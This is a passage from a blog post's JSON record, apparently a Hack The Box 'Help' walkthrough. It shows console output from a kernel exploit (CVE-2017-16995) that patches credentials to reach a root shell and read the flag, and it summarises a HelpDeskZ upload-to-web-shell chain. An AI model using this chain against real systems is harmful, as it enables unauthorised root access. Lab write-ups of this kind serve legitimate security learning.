\n[*] creating bpf map\n[*] sneaking evil bpf past the verifier\n[*] creating socketpair()\n[*] attaching bpf backdoor to socket\n[*] skbuff =&gt; ffff88003af7ba00\n[*] Leaking sock struct from ffff88001f403c00\n[*] Sock-&gt;sk_rcvtimeo at offset 472\n[*] Cred structure at ffff88003912bbc0\n[*] UID from cred structure: 1000, matches the current: 1000\n[*] hammering cred structure at ffff88003912bbc0\n[*] credentials patched, launching shell...\n# id\nid\nuid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)\n# cd \/root\ncd \/root\n# ls\nls\nroot.txt\n# cat root.txt\ncat root.txt\nb7fe6082dcdf0c1b1e02ab0d9daddb98\n<\/code><\/pre>\n<p>Root obtained. The chain was an unauthenticated HelpDeskZ 1.0.2 attachment upload giving a web shell as the help user, followed by the unpatched eBPF verifier bug (CVE-2017-16995) in the 4.4.0-116 kernel.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Machine Name Difficulty OS Logo Help &#8211; HTB Easy Linux Walkthrough nmap scan: PORT STATE SERVICE VERSION 22\/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/12\/help\/\">Read more<span 
class=\"screen-reader-text\">Help<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1554","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1554","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1554"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1554\/revisions"}],"predecessor-version":[{"id":1555,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1554\/revisions\/1555"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1554"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1554"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1554"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}